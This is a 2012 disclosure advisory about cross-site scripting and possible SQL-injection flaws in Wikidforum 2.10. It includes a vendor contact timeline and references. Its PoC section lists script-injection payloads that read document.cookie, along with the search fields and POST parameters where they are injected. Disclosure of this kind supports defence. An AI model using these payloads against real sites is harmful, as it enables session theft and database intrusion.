Advisory:		Wikidforum 2.10 Multiple security vulnerabilities
Advisory ID:		SSCHADV2012-005
Author:			Stefan Schurtz
Affected Software:	Successfully tested on Wikidforum 2.10
Vendor URL:		http://www.wikidforum.com/
Vendor Status:		informed
OSVDB ID:		80838, 80839, 80840

==========================
Vulnerability Description
==========================

Wikidforum 2.10 is prone to multiple XSS and SQL-Injection vulnerabilities

==================
PoC-Exploit
==================

// xss
Search-Field -> '"</script><script>alert(document.cookie)</script>
Search-Field -> Advanced Search -> Author -> '"</script><script>alert(document.cookie)</script>
Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> ><iMg src=N onerror=alert(document.cookie)>

// possible SQL-Injection 

Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> [sql-injection]
Search-Field -> Advanced Search -> POST-Parameter 'opt_search_select' -> [sql-injection]

=========
Solution
=========

-

====================
Disclosure Timeline
====================

19-Feb-2012 - vendor informed
10-Mar-2012 - no response from vendor
10-Mar-2012 - post on BugTraq
14-Apr-2012 - vendor informed again (thx to Henri Salo)

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-005.txt
http://www.wikidforum.com/forum/forum-software_29/wikidforum-support_31/sschadv2012-005-unfixed-xss-and-sql-injection-security-vulnerabilities_188.html
http://osvdb.org/show/osvdb/80838
http://osvdb.org/show/osvdb/80839
http://osvdb.org/show/osvdb/80840